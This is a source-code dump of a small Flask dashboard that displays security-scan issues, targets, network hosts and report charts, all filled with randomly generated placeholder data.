"length_bytes": 1717, "license_type": "no_license", "max_line_length": 386, "num_lines": 28, "path": "/README.md", "repo_name": "AtilioA/GraficosNotasUFES", "src_encoding": "UTF-8", "text": "# GraficosNotasENEM\nTraçagem de histogramas das notas dos candidatos da UFES após a adesão desta ao SiSU, em 2016. Com gráficos de 2017 e 2018, incluindo lista de espera (candidatos que não foram aprovados na primeira chamada).\n\nUtilização do Python 3.6/3.7 junto de NumPy, Matplotlib, SciPy e expressões regulares para extrair notas dos arquivos com resultados divulgados pelas universidades. Pode ser utilizado com quaisquer notas (elas devem ser separadas por quebra de linha, sem uso de vírgulas), apenas usei minha realidade (UFES) como base.\n\n## Instruções: \nVocê vai precisar do Python 3.6, pelo menos (por conta das fstrings e etc), além de alguns módulos. Rode estes comandos no terminal para se certificar de que os têm instalados:\n\n```\npip install numpy\n\npip install matplotlib\n\npip install scipy\n```\n\nDepois, clone este repositório, abra o terminal na pasta do repositório e então execute:\n\n`python histogramanotas.py`.\n\n##\nDiferentes padrões de regex foram utilizados para extração das notas, de acordo com os padrões encontrados nos arquivos das universidades. Alguns incluíam documento do candidato (CPF, RG), por exemplo, e portanto precisaram de um maior refinamento da busca. 
Outros arquivos, como os da UFES, só possuíam como número a própria nota do candidato, então um padrão medíocre também serviria.\n\n![UFES 2017](Histogramas/ufes2017.png?raw=true \"UFES 2017\")\n![UFES 2018](Histogramas/ufes2018.png?raw=true \"UFES 2018\")\n![UFES 2018 (lista de espera)](Histogramas/ufes%20lista%20de%20espera2018.png?raw=true \"UFES 2018, lista de espera\")\n![UNIFEI 2017](Histogramas/unifei2017.png?raw=true \"UNIFEI2017\")\n![IFSC 2018](Histogramas/ifsc2018.png?raw=true \"IFSC 2018\")\n" }, { "alpha_fraction": 0.650943398475647, "alphanum_fraction": 0.6603773832321167, "avg_line_length": 13.25, "blob_id": "6283d525223b811ef58980ab4a6e80a8bd652d79", "content_id": "e2abf9117c8f1a9fe022f0f581682ed0cf3793ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 106, "license_type": "no_license", "max_line_length": 35, "num_lines": 8, "path": "/Makefile", "repo_name": "AtilioA/GraficosNotasUFES", "src_encoding": "UTF-8", "text": "all:\n\tpy histogramanotas.py\n\nclean:\n\trmdir /s /q __pycache__\n\ncleanR:\n\tdel /s /q \"Histogramas\\ALEATR~1\\*\"\n" }, { "alpha_fraction": 0.5505263209342957, "alphanum_fraction": 0.6131578683853149, "avg_line_length": 36.53845977783203, "blob_id": "e53140d6b2014adbe7153a4277bd1eb69a9d07ba", "content_id": "0c54efdd7dd88e482c617a71f3c6dd6929a26203", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1922, "license_type": "no_license", "max_line_length": 98, "num_lines": 52, "path": "/extras.py", "repo_name": "AtilioA/GraficosNotasUFES", "src_encoding": "UTF-8", "text": "import os\nimport random\n\n\n# Gerador de .txt com notas aleatórias\ndef notasAleatorias():\n    pastaRepo = os.getcwd()\n    pastaNotas = os.path.join(pastaRepo, \"Notas.txt\")\n\n    outfile = open(f'{pastaNotas}\\\\notas2049.txt', 'w+')\n\n    tipo = random.randrange(1, 4)\n\n    if tipo == 3:\n        mu = random.randrange(625, 720) # Média aleatória\n        sigma = random.randrange(10, 20) # Desvio padrão aleatório\n        n = random.randrange(1000, 5000) # Tamanho de amostra aleatório\n\n    elif tipo == 2:\n        mu = random.randrange(605, 760) # Média aleatória\n        sigma = random.randrange(5, 25) # Desvio padrão aleatório\n        n = random.randrange(800, 7000) # Tamanho de amostra aleatório\n\n    elif tipo == 1:\n        mu = random.randrange(650, 770) # Média aleatória\n        sigma = random.randrange(10, 30) # Desvio padrão aleatório\n        n = random.randrange(2000, 6000) # Tamanho de amostra aleatório\n\n    # Cria números de acordo com a distribuição desejada e escreve apropriadamente no arquivo .txt\n    for _ in range(n):\n        num = round((random.weibullvariate(mu, sigma)), 2)\n        outfile.write(f'{num}\\n')\n\n    idHistograma = f'{mu}_{sigma}_{n}' # Nomear histogramas aleatórios com dados da amostra gerada\n\n    # Criar ruído (FALTA TESTAR SE ISSO FAZ SENTIDO)\n    # for _ in range(10,100):\n    #     num2 = round(random.uniform(700,800), 2)\n    #     outfile.write(f'{num2}\\n')\n    # for _ in range(50,300):\n    #     num2 = round(random.uniform(600,700), 2)\n    #     outfile.write(f'{num2}\\n')\n    # for _ in range(5,50):\n    #     num2 = round(random.uniform(500,600), 2)\n    #     outfile.write(f'{num2}\\n')\n    # for _ in range(10,20):\n    #     num2 = round(random.uniform(770,810), 2)\n    #     outfile.write(f'{num2}\\n')\n\n    outfile.close()\n    print('\\nDados aleatórios escritos em notas2049.txt')\n    return str(idHistograma)\n" } ]
4
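The statistics block in histogramanotas.py above reduces to three NumPy calls plus the standard z-score formula z = (x - media) / desvio (the script's `minhaNota = 777` is just a placeholder). A standalone sketch with invented grades:

```python
import numpy as np

notas = np.array([612.4, 655.0, 701.3, 688.9, 640.2])  # hypothetical grades
minha_nota = 690.0                                      # hypothetical score to rank

media = np.mean(notas)
desvio = np.std(notas)  # population standard deviation (ddof=0), as in the script
zscore = (minha_nota - media) / desvio

print(f'média={media:.2f}, desvio={desvio:.2f}, z-score={zscore:.2f}')
```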
basireddyshreya/Chatbot
https://github.com/basireddyshreya/Chatbot
095c6662f3a21f0c8e4fb829c81511e899840853
9ff4b2b3b59112721f573d0f5be4d0a27483923b
0d7dbf772bacc9d814ee9c3285b646cb8fa2f1d6
refs/heads/master
2020-03-26T04:36:58.234613
2018-08-13T01:08:51
2018-08-13T01:08:51
144,513,023
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7099999785423279, "alphanum_fraction": 0.7250000238418579, "avg_line_length": 27.714284896850586, "blob_id": "4318a3075b5607b06296c27470adda729fd49fe9", "content_id": "d9c54546d2a67dd1058be0df1e06804e5b266129", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "permissive", "max_line_length": 41, "num_lines": 7, "path": "/chatbotarticle1.py", "repo_name": "basireddyshreya/Chatbot", "src_encoding": "UTF-8", "text": "def evaluateRecall(y, yTest, k=1):\n\tnumExamples = float(len(y))\n\tnumCorrect = 0\n\tfor predictions, label in zip(y, yTest):\n\t\tif label in predictions[:k]:\n\t\t\tnumCorrect+=1\n\treturn numCorrect/numExamples" } ]
1
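The single file in the Chatbot record above implements recall@k for retrieval-based chatbots: a prediction counts as correct when the ground-truth response appears among the first k ranked candidates. A usage sketch with toy data (the function is copied verbatim from the record; the inputs are invented):

```python
def evaluateRecall(y, yTest, k=1):
	numExamples = float(len(y))
	numCorrect = 0
	for predictions, label in zip(y, yTest):
		if label in predictions[:k]:
			numCorrect+=1
	return numCorrect/numExamples

# Each row of y ranks candidate responses, best first; yTest holds the true one.
y = [[3, 1, 2], [2, 0, 1], [1, 0, 3]]
yTest = [3, 0, 0]

print(evaluateRecall(y, yTest, k=1))  # only the first example hits -> 0.333...
print(evaluateRecall(y, yTest, k=2))  # all three hit within the top 2 -> 1.0
```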
canattofilipe/keycloak
https://github.com/canattofilipe/keycloak
439a6d66355e5c81ef3f06b1cf6c3d1bc33beaaf
7ad1c350a320e8c84d662d6ba57285a56a419c5f
865dc42504bc48279f5b059e3854b88c1ef2adaf
refs/heads/master
2023-01-08T13:01:01.766406
2020-11-12T13:42:51
2020-11-12T16:21:08
276,911,273
0
0
Apache-2.0
2020-07-03T13:52:10
2020-07-03T12:07:52
2020-07-03T13:38:06
null
[ { "alpha_fraction": 0.671999990940094, "alphanum_fraction": 0.8320000171661377, "avg_line_length": 62, "blob_id": "8e6f21ef7108e512a9cc126dfb66b5ec51348dd5", "content_id": "a4cfa2f4388583fa4ef435f7c5f3111969ab3654", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 125, "license_type": "permissive", "max_line_length": 88, "num_lines": 2, "path": "/testsuite/integration-arquillian/tests/other/base-ui/src/main/resources/themes/localized-theme-preview/account/theme.properties", "repo_name": "canattofilipe/keycloak", "src_encoding": "UTF-8", "text": "parent=${theme-default-name}-preview\nlocales=en,de,lang01,lang02,lang03,lang04,lang05,test,lang06,lang07,lang08,lang09,lang10" }, { "alpha_fraction": 0.7400521636009216, "alphanum_fraction": 0.7429876327514648, "avg_line_length": 41, "blob_id": "d5695b0ba5b36f582668e7c1077f9bbd388618ea", "content_id": "676cce05d411d9c3fc0349c662f492453854b195", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3066, "license_type": "permissive", "max_line_length": 134, "num_lines": 73, "path": "/server-spi/src/main/java/org/keycloak/storage/federated/UserFederatedUserCredentialStore.java", "repo_name": "canattofilipe/keycloak", "src_encoding": "UTF-8", "text": "/*\n * Copyright 2016 Red Hat, Inc. and/or its affiliates\n * and other contributors as indicated by the @author tags.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\npackage org.keycloak.storage.federated;\n\nimport org.keycloak.credential.CredentialModel;\nimport org.keycloak.models.RealmModel;\nimport org.keycloak.provider.Provider;\n\nimport java.util.List;\nimport java.util.stream.Collectors;\nimport java.util.stream.Stream;\n\n/**\n * @author <a href=\"mailto:[email protected]\">Bill Burke</a>\n * @version $Revision: 1 $\n */\npublic interface UserFederatedUserCredentialStore extends Provider {\n void updateCredential(RealmModel realm, String userId, CredentialModel cred);\n CredentialModel createCredential(RealmModel realm, String userId, CredentialModel cred);\n boolean removeStoredCredential(RealmModel realm, String userId, String id);\n CredentialModel getStoredCredentialById(RealmModel realm, String userId, String id);\n\n /**\n * @deprecated Use {@link #getStoredCredentialsStream(RealmModel, String) getStoredCredentialsStream} instead.\n */\n @Deprecated\n default List<CredentialModel> getStoredCredentials(RealmModel realm, String userId) {\n return this.getStoredCredentialsStream(realm, userId).collect(Collectors.toList());\n }\n\n /**\n * Obtains the credentials associated with the federated user identified by {@code userId}.\n *\n * @param realm a reference to the realm.\n * @param userId the user identifier.\n * @return a non-null {@code Stream} of credentials.\n */\n Stream<CredentialModel> getStoredCredentialsStream(RealmModel realm, String userId);\n\n /**\n * @deprecated Use {@link #getStoredCredentialsByTypeStream(RealmModel, String, 
String) getStoredCredentialsByTypeStream} instead.\n */\n @Deprecated\n default List<CredentialModel> getStoredCredentialsByType(RealmModel realm, String userId, String type) {\n return this.getStoredCredentialsByTypeStream(realm, userId, type).collect(Collectors.toList());\n }\n\n /**\n * Obtains the credentials of type {@code type} that are associated with the federated user identified by {@code userId}.\n *\n * @param realm a reference to the realm.\n * @param userId the user identifier.\n * @param type the credential type.\n * @return a non-null {@code Stream} of credentials.\n */\n Stream<CredentialModel> getStoredCredentialsByTypeStream(RealmModel realm, String userId, String type);\n\n CredentialModel getStoredCredentialByNameAndType(RealmModel realm, String userId, String name, String type);\n}\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 29.66666603088379, "blob_id": "3e4e92bd61ac56d25d592df2ad12e9276aaa4328", "content_id": "9396728c7d2e027e0ee134f2cdd284cee0a055db", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 91, "license_type": "permissive", "max_line_length": 33, "num_lines": 3, "path": "/quarkus/deployment/src/test/resources/application.properties", "repo_name": "canattofilipe/keycloak", "src_encoding": "UTF-8", "text": "quarkus.http.root-path=/auth\nquarkus.application.name=Keycloak\nquarkus.banner.enabled=false" }, { "alpha_fraction": 0.7102510333061218, "alphanum_fraction": 0.7179219126701355, "avg_line_length": 41.17647171020508, "blob_id": "b8ca335b8a7efd05409da1495b44204a358c7add", "content_id": "94fcfaed95132bfef44bcc49fee18abffb137fe4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2868, "license_type": "permissive", "max_line_length": 122, "num_lines": 68, "path": "/misc/scripts/upgrade-wildfly/upgrade-keycloak-to-wildfly-tag.py", "repo_name": "canattofilipe/keycloak", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# *\n# * Copyright 2020 Red Hat, Inc. and/or its affiliates\n# * and other contributors as indicated by the @author tags.\n# *\n# * Licensed under the Apache License, Version 2.0 (the \"License\");\n# * you may not use this file except in compliance with the License.\n# * You may obtain a copy of the License at\n# *\n# * http://www.apache.org/licenses/LICENSE-2.0\n# *\n# * Unless required by applicable law or agreed to in writing, software\n# * distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n# *\n# *\n#\n# Purpose: Update various necessary bits of Keycloak to align with the specified Wildfly tag. 
Perform this by:\n#\n# * Incrementing the jboss-parent element version if necessary,\n# * Updating versions of artifacts shared with Wildfly and Wildfly Core in main Keycloak pom.xml file,\n# * Updating versions of artifacts shared with Wildfly and Wildfly Core utilized by Keycloak adapters\n#\n# Usage: Run as, e.g.:\n# ./upgrade-keycloak-to-wildfly-tag.py 20.0.0.Final\n#\n# Or call the script without arguments to get the further help\n\nimport os, sys\n\nimport wildfly.upgrade as wu\n\ndef usage():\n print(\"Run as: \\n\\t%s Wildfly.Tag.To.Upgrade.To \\ne.g.:\\n\\t%s 20.0.0.Final\\n\" % (sys.argv[0], sys.argv[0]))\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 2:\n usage()\n sys.exit(1)\n\n wildflyTag = wu.isWellFormedWildflyTag(sys.argv[1])\n wildflyPomBaseUrl = \"https://github.com/wildfly/wildfly/raw/%s/pom.xml\" % wildflyTag\n\n wu.getModuleLogger().info(\"Retrieving Wildfly's pom.xml for tag: %s\" % wildflyTag)\n wildflyPomFile = wu.saveUrlToNamedTemporaryFile(wildflyPomBaseUrl)\n\n wildflyPomXmlRoot = wu.getXmlRoot(wildflyPomFile)\n wildflyCoreTag = wu.isWellFormedWildflyTag( wu.getPomProperty(wildflyPomXmlRoot, \"version.org.wildfly.core\")[0].text )\n wildflyCorePomBaseUrl = \"https://github.com/wildfly/wildfly-core/raw/%s/pom.xml\" % wildflyCoreTag\n\n wu.getModuleLogger().info(\"Retrieving Wildfly-Core pom.xml for tag: %s\" % wildflyCoreTag)\n wildflyCorePomFile = wu.saveUrlToNamedTemporaryFile(wildflyCorePomBaseUrl)\n\n if wildflyPomFile != None and wildflyCorePomFile != None:\n\n # Subtask - Update main Keycloak pom.xml file\n wu.updateMainKeycloakPomFile(wildflyPomFile, wildflyCorePomFile)\n # Subtask - Update Keycloak adapters\n wu.performKeycloakAdapterLicenseFilesUpdateTask(wildflyPomFile, wildflyCorePomFile)\n # Subtask - Update RH-SSO adapters\n wu.performRhssoAdapterLicenseFilesUpdateTask(wildflyPomFile, wildflyCorePomFile)\n\n for filename in [wildflyPomFile, wildflyCorePomFile]:\n os.remove(filename)\n" } ]
4
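upgrade-keycloak-to-wildfly-tag.py above drives everything through the repo-local `wildfly.upgrade` module; the step worth isolating is how it discovers the matching Wildfly Core tag by reading one Maven property out of Wildfly's pom.xml. A trimmed sketch of just that lookup, reusing the helper calls exactly as the script does (it assumes the same module is importable and that GitHub is reachable):

```python
import os

import wildfly.upgrade as wu

# Same flow as the full script, cut down to tag discovery only.
wildflyTag = wu.isWellFormedWildflyTag("20.0.0.Final")
pomUrl = "https://github.com/wildfly/wildfly/raw/%s/pom.xml" % wildflyTag

pomFile = wu.saveUrlToNamedTemporaryFile(pomUrl)
try:
    pomRoot = wu.getXmlRoot(pomFile)
    # getPomProperty returns the matching elements; the script reads [0].text.
    coreTag = wu.getPomProperty(pomRoot, "version.org.wildfly.core")[0].text
    print("Wildfly %s builds against Wildfly Core %s" % (wildflyTag, coreTag))
finally:
    os.remove(pomFile)
```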
valerybondarev/dashboard
https://github.com/valerybondarev/dashboard
bf04d31234c4fc1b7fc1b1f05762289056bb54ac
90857f4902b48e67525b5011395d1a416e4cba7d
1d2ba0b6e6d6f293dd3de6f87671fbdea0ab8f9c
refs/heads/master
2020-08-04T18:28:09.869327
2019-10-02T02:28:45
2019-10-02T02:28:45
212,236,619
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.45644834637641907, "alphanum_fraction": 0.48615801334381104, "avg_line_length": 21.393939971923828, "blob_id": "f1df2c9f8c197d365172f09e775dad1a492a95fd", "content_id": "72bcffce764ac645afb311002c050c8aa70d60e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1481, "license_type": "no_license", "max_line_length": 70, "num_lines": 66, "path": "/static/js/dashboard.js", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "\nvar months;\nvar critical_data;\nvar high_data;\nvar medium_data;\nvar low_data;\n\n $(document).ready(function () {\n $.ajax({\n url: '/get_report_data',\n type: 'post',\n success: function (response) {\n console.log(response);\n months = response['months'];\n critical_data = response['critical_data'];\n high_data = response['high_data'];\n medium_data = response['medium_data'];\n low_data = response['low_data'];\n\n\n var ctx = document.getElementById('myChart').getContext('2d');\n var myChart = new Chart(ctx, {\n type: 'line',\n data: {\n labels: months,\n datasets: [{\n label: 'Critical',\n data: critical_data,\n backgroundColor: \"rgba(237,85,101,0.7)\"\n }, {\n label: 'High',\n data: high_data,\n backgroundColor: \"rgba(248,172,89,1)\"\n }, {\n label: 'Medium',\n data: medium_data,\n backgroundColor: \"rgba(35,198,200,0.8)\"\n }, {\n label: 'Low',\n data: low_data,\n backgroundColor: \"rgba(28,132,198,0.5)\"\n }]\n },\n options: {\n maintainAspectRatio: false,\n animation: {\n duration: 0\n },\n scales: {\n yAxes: [{\n ticks: {\n stepSize: 1,\n min: 0,\n suggestedMax: 4\n },\n scaleLabel: {\n labelString: 'Number of Issues',\n display: true\n }\n\n }]\n }\n }\n });\n }\n });\n });\n\n\n" }, { "alpha_fraction": 0.4815565347671509, "alphanum_fraction": 0.4980407953262329, "avg_line_length": 31.460525512695312, "blob_id": "912b17f206921fac719c8290baf47529d890aada", "content_id": "3eca8b9ff5a8f9b74879d6ab6161fc6df5f49b5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7401, "license_type": "no_license", "max_line_length": 163, "num_lines": 228, "path": "/functions.py", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "import peewee\n\nfrom models import *\n\nimport random\nimport collections\n\nnavigation_menu = [\n {\n \"link\": \"/dashboard\",\n \"icon\": \"fas fa-fw fa-tachometer-alt\",\n \"title\": \"Dashboard\"\n },\n {\n \"link\": \"/issues\",\n \"icon\": \"fas fa-fw fa-exclamation-triangle\",\n \"title\": \"Issues\"\n },\n {\n \"link\": \"/reports\",\n \"icon\": \"fas fa-fw fa-chart-area\",\n \"title\": \"Reports\"\n },\n {\n \"link\": \"/targets\",\n \"icon\": \"fas fa-fw fa-bullseye\",\n \"title\": \"Targets\"\n },\n {\n \"link\": \"/network\",\n \"icon\": \"fas fa-fw fa-laptop\",\n \"title\": \"Network\"\n }\n]\n\npage_titles = {\n \"/dashboard\": \"Dashboard\",\n \"/reports\": \"Reports\",\n \"/targets\": \"Targets\",\n \"/issues\": \"Issues\",\n \"/network\": \"Network\"\n}\n\ntypes = [\n {\n 'type': 'danger',\n 'title': 'Critical',\n 'color': '#e74a3b',\n 'order': 4\n },\n {\n 'type': 'primary',\n 'title': 'Low',\n 'color': '#4e73df',\n 'order': 2\n },\n {\n 'type': 'warning',\n 'title': 'High',\n 'color': '#f6c23e',\n 'order': 3\n },\n {\n 'type': 'info',\n 'title': 'Medium',\n 'color': '#36b9cc',\n 'order': 1\n }\n ]\n\nissues = [\n {\n 'type': 'info',\n 'title': 'Reflected Cross-Site Scripting (XSS)',\n 'issue_id': 123\n },\n {\n 'type': 'primary',\n 'title': 'Web 
Server In Use Contains Known Vulnerabilities (Apache)',\n 'issue_id': 234\n },\n {\n 'type': 'danger',\n 'title': 'Web Server Directory Listings Expose List of Files',\n 'issue_id': 345\n }\n]\n#\n# def create_database():\n# try:\n# pg_db.drop_tables([\n# Issue_category\n# ]\n# )\n# print('Dropped.')\n# except peewee.InternalError as err:\n# print(err)\n# try:\n# pg_db.create_tables([\n# Issue_category\n# ])\n# print('Created.')\n# except peewee.InternalError as err:\n# print(err)\n\n\ndef test_network_data():\n res = {}\n protocols = ['tcp','ftp','sftp','ip','ssl','ssh','http','https']\n services = ['Ubuntu 13', 'Windows XP', 'MacOS', 'Android']\n result_arr = []\n for i in range(1,11):\n tmp_arr = {}\n tmp_arr['ip_address'] = str(random.randint(1,255)) + '.' + str(random.randint(1,255)) + '.' + str(random.randint(1,255)) + '.' + str(random.randint(1,255))\n tmp_arr['hostnames'] = ''.join(random.choice(['hello', 'apple', 'something', 'yeah', 'nope', 'lalala']) for _ in range(5))\n tmp_arr['port'] = random.randint(1,9999)\n tmp_arr['protocol'] = random.choice(protocols)\n tmp_arr['service'] = random.choice(protocols)\n tmp_arr['service_info'] = random.choice(services)\n result_arr.append(tmp_arr)\n res['recordsTotal'] = len(result_arr)\n res['recordsFiltered'] = len(result_arr)\n res['data'] = result_arr\n print(res)\n return res\n\n\ndef test_targets_data():\n hostnames = ['test','main','index','preview','custom']\n zones = ['ru','com','net','org']\n result_arr = []\n for i in range(1,6):\n tmp_arr = {}\n tmp_arr['target_id'] = random.randint(1,9999)\n tmp_arr['hostname'] = random.choice(hostnames) + '.' + random.choice(hostnames) + '.' + random.choice(zones)\n tmp_arr['low_issues'] = random.randint(0,9)\n tmp_arr['medium_issues'] = random.randint(0,9)\n tmp_arr['high_issues'] = random.randint(0,9)\n tmp_arr['critical_issues'] = random.randint(0,9)\n result_arr.append(tmp_arr)\n return result_arr\n\ndef test_report_data():\n months = ['jan','feb','mar','apr','may','jun','jul','aug','sep','oct','nov','dec']\n result_arr = {\n 'months': [],\n 'critical_data': [],\n 'high_data': [],\n 'medium_data': [],\n 'low_data': []\n }\n columns = range(1,random.randint(1,20))\n for i in columns:\n result_arr['months'].append(str(random.randint(1,30)) + ' ' + random.choice(months))\n result_arr['critical_data'].append(random.randint(1,10))\n result_arr['high_data'].append(random.randint(1,10))\n result_arr['medium_data'].append(random.randint(1,10))\n result_arr['low_data'].append(random.randint(1,10))\n return result_arr\n\ndef test_dashboard_first():\n return random.choice(types)\n\ndef test_issues_list(filter=None):\n result_arr = []\n tmp_arr = {}\n hostnames = ['test', 'main', 'index', 'preview', 'custom']\n for i in range(1,10):\n tmp_arr = {}\n tmp_type = random.choice(types)\n tmp_arr['id'] = i\n tmp_arr['type'] = tmp_type['title']\n tmp_arr['bg'] = tmp_type['type']\n tmp_arr['order'] = tmp_type['order']\n tmp_arr['issue_title'] = ''.join(random.choice(['hello', 'apple', 'something', 'yeah', 'nope', 'lalala']) for _ in range(5))\n tmp_arr['description'] = 'Description of Issue'\n tmp_arr['links'] = [\n 'https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)',\n 'https://en.wikipedia.org/wiki/Cross-site_scripting'\n ]\n tmp_arr['recomendation'] = 'Some test'\n tmp_arr['occurences'] = []\n for p in range (1, 10):\n tmp_arr['occurences'].append(\n {\n 'target': tmp_arr['issue_title'],\n 'port': random.randint(1,9999),\n 'version': str(random.randint(0,5)) + '.' + str(random.randint(1,10)) + '.' 
+ str(random.randint(1,50)),\n 'path': '/' + random.choice(hostnames),\n 'affcted_parameter': ''.join(random.choice(['a', 'b', 'c', 'd', 'e', 'f']) for _ in range(1)),\n 'age': str(random.randint(1,10)) + ' days',\n 'scanner_output': ' View ',\n 'other': '<div class=\"pull-right dropdown text-default\"><button data-toggle=\"dropdown\" type=\"button\" '\n 'aria-expanded=\"false\" aria-haspopup=\"true\" class=\"btn btn-white dropdown-toggle\"><i '\n 'class=\"fas fa-ellipsis-h\"></i></button> <ul aria-labelledby=\"dropdown-' + str(random.randint(1,99999)) + '\" '\n 'class=\"dropdown-menu\"><li class=\"dropdown-header\">Snooze by ...</li> <li><a href=\"#\" '\n 'title=\"\" class=\"snooze-issue\">accepting risk</a></li> <li><a href=\"#\" title=\"\" '\n 'class=\"snooze-issue\">marking as false positive</a></li> <li><a href=\"#\" title=\"\" '\n 'class=\"snooze-issue\">adding mitigating controls</a></li></ul></div> '\n }\n )\n if filter is not None:\n if (tmp_arr['type']).lower() == filter:\n result_arr.append(tmp_arr)\n else:\n result_arr.append(tmp_arr)\n\n\n return sorted(result_arr, key=lambda k: k['order'], reverse=True)\n\ndef get_cnt_group_issues(arr):\n types_issues = ['Low', 'Medium', 'High','Critical']\n result = {\n \"Low\" : 0,\n \"Medium\": 0,\n \"High\": 0,\n \"Critical\": 0\n }\n cnt = 0\n for t in types_issues:\n for i in arr:\n if i['type'] == t:\n result[t] += 1\n return result\n\n\ndef get_top_issues():\n return issues\n" }, { "alpha_fraction": 0.3909910023212433, "alphanum_fraction": 0.3909910023212433, "avg_line_length": 25.428571701049805, "blob_id": "dae2c01413178c8c52f336eb6d44bb366dd21a8e", "content_id": "8034c486ba63be239c0486aae7c533f35eb5dfee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 555, "license_type": "no_license", "max_line_length": 42, "num_lines": 21, "path": "/static/js/network.js", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "// Call the dataTables jQuery plugin\n$(document).ready(function() {\n\n $('#dataTable').DataTable({\n \"processing\": true,\n \"serverSide\": true,\n ajax: {\n url: '/data_source',\n type: 'POST'\n },\n \"lengthChange\": false,\n \"columns\": [\n { \"data\": \"ip_address\" },\n { \"data\": \"hostnames\" },\n { \"data\": \"port\" },\n { \"data\": \"protocol\" },\n { \"data\": \"service\" },\n { \"data\": \"service_info\" }\n ]\n });\n});\n" }, { "alpha_fraction": 0.6860648989677429, "alphanum_fraction": 0.6908155083656311, "avg_line_length": 36.117645263671875, "blob_id": "f7a525ddb0d13d06858a1c7c53a9c4fb92783e9d", "content_id": "25e8bbd4c8ae4cc69186f629fe0d5a34b1b9b305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2526, "license_type": "no_license", "max_line_length": 176, "num_lines": 68, "path": "/main.py", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "import sys\nfrom flask import Flask, url_for, request, render_template\nfrom functions import *\n\napp = Flask(__name__)\n\[email protected]('/')\[email protected]('/index')\[email protected]('/dashboard')\ndef index():\n return render_template('dashboard.html', nav_menu=navigation_menu, page_title=page_titles[\"/dashboard\"], first_card=test_dashboard_first(), issues=get_top_issues())\n\[email protected]('/issues', methods=['GET'])\ndef issues():\n issues_list = test_issues_list()\n return render_template('issues.html', nav_menu=navigation_menu, page_title=page_titles[\"/issues\"], 
issues_list=issues_list, group_issues=get_cnt_group_issues(issues_list))\n\[email protected]('/issues/<int:type>', methods=['GET'])\ndef issues_type(type):\n    issues_list = test_issues_list()\n    return render_template('issues.html', nav_menu=navigation_menu, page_title=page_titles[\"/issues\"],\n                           issues_list=issues_list, group_issues=get_cnt_group_issues(issues_list))\n\n\[email protected]('/network', methods=['GET'])\ndef network():\n    return render_template('network.html', nav_menu=navigation_menu, page_title=page_titles[\"/network\"])\n\[email protected]('/reports', methods=['GET'])\ndef reports():\n    return render_template('reports.html', nav_menu=navigation_menu, page_title=page_titles[\"/reports\"])\n\[email protected]('/targets', methods=['GET'])\ndef targets():\n    return render_template('targets.html', nav_menu=navigation_menu, page_title=page_titles[\"/targets\"], items=test_targets_data())\n\[email protected](404)\ndef not_found(error):\n    return render_template('404.html', nav_menu=navigation_menu, page_title=\"404 - Page not found\"), 404\n\n\[email protected]('/create_database', methods=['GET', 'POST'])\ndef create_database_route():\n    # Renamed so the view no longer shadows (and endlessly recurses into) itself;\n    # it delegates to functions.create_database, which is still commented out there.\n    return create_database()\n\[email protected]('/data_source', methods=['POST'])\ndef test_dt():\n    return test_network_data()\n\[email protected]('/delete_target', methods=['POST'])\ndef delete_target():\n    return request.form['target_id'] # function to delete target\n\[email protected]('/scan_target', methods=['POST'])\ndef scan_target():\n    return request.form['target_id'] # function to scan target\n\[email protected]('/get_report_data', methods=['POST'])\ndef get_report_data():\n    return test_report_data()\n\nif __name__ == '__main__':\n    app.run(debug=True)\n\n\n" }, { "alpha_fraction": 0.6303030252456665, "alphanum_fraction": 0.6412121057510376, "avg_line_length": 24.030303955078125, "blob_id": "337e9a157213e9cd0222118d7aac39af53339902", "content_id": "9259ae4864de551b25d4162ee157568b591fc22e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 825, "license_type": "no_license", "max_line_length": 80, "num_lines": 33, "path": "/models.py", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "from peewee import *\nimport datetime\n\n\ndb_user = ''\ndb_password = ''\ndb_name = ''\ndb_host = 'localhost'\ndb_port = '5432'\n\npg_db = PostgresqlDatabase(db_name, user=db_user, password=db_password,\n                           host=db_host, port=db_port)\nnow = datetime.datetime.now()\n\nclass BaseModel(Model):\n    class Meta:\n        database = pg_db\n\n#\n# class Issue_category(BaseModel):\n#     id = PrimaryKeyField(null=False, primary_key=True)\n#     title = CharField(max_length=500, null=False)\n#     color = CharField(max_length=50, null=False)\n#\n#     created_at = DateTimeField(constraints=[SQL('DEFAULT CURRENT_TIMESTAMP')])\n#     updated_at = DateTimeField(constraints=[SQL('DEFAULT 